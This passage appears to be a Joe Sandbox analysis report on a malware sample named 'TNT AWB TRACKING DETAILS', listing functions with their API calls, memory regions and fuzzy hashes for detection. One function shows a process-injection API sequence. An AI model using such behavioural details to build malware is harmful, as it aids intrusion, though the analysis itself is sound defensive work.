                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconNotifyShell_
                                      • String ID:
                                      • API String ID: 1144537725-0
                                      • Opcode ID: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                      • Instruction ID: eb3a406907b17a2fb372061a5351d340f380801689ea858bebf243c914dbfa85
                                      • Opcode Fuzzy Hash: 02018e3f435d091181cdea07546ede041b4d96144d17d916b2823846d4297506
                                      • Instruction Fuzzy Hash: 16318F70608701DFD320CF25D855797BBE4BB85314F000C3EE5AA87391E7B8A958CB5A
                                      Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0043214B
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _malloc.LIBCMT ref: 0043215D
                                      • _malloc.LIBCMT ref: 0043216F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _malloc$AllocateHeap
                                      • String ID:
                                      • API String ID: 680241177-0
                                      • Opcode ID: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                      • Opcode Fuzzy Hash: f71c381a9a4e64bea8472010c286ed0a2169748a03ca4327bb91778eef0474c7
                                      • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                      Function 00409519 Relevance: 4.5, APIs: 3, Instructions: 31windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • TranslateMessage.USER32(?), ref: 00409556
                                      • DispatchMessageW.USER32(?), ref: 00409561
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Message$DispatchPeekTranslate
                                      • String ID:
                                      • API String ID: 4217535847-0
                                      • Opcode ID: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction ID: 9fbe2eaaa5ffb99098057fa667d4f29c0aa55754a5137076743fac66577e99fa
                                      • Opcode Fuzzy Hash: ced410c349f54cf5afb894e4facd1df4a4f56f438d67fe37ea70020fd5d89546
                                      • Instruction Fuzzy Hash: D8F05431554300AAE624D7A18D41F9B76A89F98784F40482EB641962E1EB78D444CB5A
                                      Function 004320F8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0043210A
                                        • Part of subcall function 00413748: RtlFreeHeap.NTDLL(00000000,00000000,?,00417A5A,00000000), ref: 0041375E
                                        • Part of subcall function 00413748: GetLastError.KERNEL32(00000000,?,00417A5A,00000000), ref: 00413770
                                      • _free.LIBCMT ref: 0043211D
                                      • _free.LIBCMT ref: 00432130
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction ID: d08fe22c6a524c27e4c6c7bcf1019f14b9a5eff3fc739cf1d41fcb720108e0a5
                                      • Opcode Fuzzy Hash: 471d261c1978e8fd492efb66726f25644d258391566ce7e49abf025be84b45d1
                                      • Instruction Fuzzy Hash: 29E092F290071433CD1099219941A87F38C4B15B11F08402AFA15A3301E969FA40C1E9
                                      Function 0040AFA0 Relevance: 3.3, APIs: 2, Instructions: 258COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClearVariant
                                      • String ID:
                                      • API String ID: 1473721057-0
                                      • Opcode ID: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                      • Instruction ID: 76271617df0236ab3ccd2777984eb13d60b28668e4953fb9a85eec064aa2abc3
                                      • Opcode Fuzzy Hash: 30fb1b5656a8e298aebe1b45ed9f9297ed51282c110b4441b4c64d109fdc6671
                                      • Instruction Fuzzy Hash: F891A370A00204DFDB14DF65D884AAAB3B5EF09304F24C56BE915AB391D739EC41CBAE
                                      Function 00467AC4 Relevance: 3.1, APIs: 2, Instructions: 130COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                      • Instruction ID: 2565b1472f88146c75409e19c065a4aacb94a5f6c219594ae44f545f2623c2f3
                                      • Opcode Fuzzy Hash: a57e6d4aea9ef27badbc9b4b1c8ddb52858cb97d4f84bb6cc5dd8c3df2be8051
                                      • Instruction Fuzzy Hash: 85412871D00104AFDB10AF15C881BAE7B74AF4670CF14C05AFA055B342E63DA946CBAA
                                      Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                        • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                      • _strcat.LIBCMT ref: 0040F786
                                        • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                        • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                      • String ID:
                                      • API String ID: 3199840319-0
                                      • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                      • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                                      • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                                      • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                                      Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                      Download Yara Rule
                                      APIs
                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                      • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: FreeInfoLibraryParametersSystem
                                      • String ID:
                                      • API String ID: 3403648963-0
                                      • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                      • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                                      • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                                      • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                                      Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      • __lock_file.LIBCMT ref: 00414A8D
                                        • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                      • __fclose_nolock.LIBCMT ref: 00414A98
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                      • String ID:
                                      • API String ID: 2800547568-0
                                      • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                      • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                                      • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                                      • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                                      Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • __lock_file.LIBCMT ref: 00415012
                                      • __ftell_nolock.LIBCMT ref: 0041501F
                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                      • String ID:
                                      • API String ID: 2999321469-0
                                      • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                      • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                                      • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                                      • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                                      Function 03F3AB0D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03F3B2CB
                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03F3B361
                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03F3B383
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1452276685.0000000003F39000.00000040.00000020.00020000.00000000.sdmp, Offset: 03F39000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_3f39000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                      • String ID:
                                      • API String ID: 2438371351-0
                                      • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction ID: 307e56ec01b9ad6cd7ccec5a962faf69991718db2375414e55be2acb741326f9
                                      • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                      • Instruction Fuzzy Hash: CE12DF24E24658C6EB24DF64D8507DEB232EF69300F1090E9910DEB7A5E77A4F81CF5A
                                      Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                      • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                                      • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                                      • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                                      Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                      • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                                      • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                                      • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                                      Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ProtectVirtual
                                      • String ID:
                                      • API String ID: 544645111-0
                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                      • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                      Function 00408F40 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                      • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                      • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                      • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                      Function 0046ADB6 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove
                                      • String ID:
                                      • API String ID: 4104443479-0
                                      • Opcode ID: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                      • Instruction ID: ba1a180a354307970ca5324e735c4d43e275f35ec71acda5bde6c4d397417e15
                                      • Opcode Fuzzy Hash: 4ce60ccdf1fc02583e70ba5d5e18dff6b69084b34d7bdf980496efa43948cae9
                                      • Instruction Fuzzy Hash: 4811A572A00614ABCB10EFB9C98585BB7E9EF44354710862AFC18E7741E635FD50CBD5
                                      Function 00414C76 Relevance: 1.5, APIs: 1, Instructions: 40COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: __lock_file
                                      • String ID:
                                      • API String ID: 3031932315-0
                                      • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
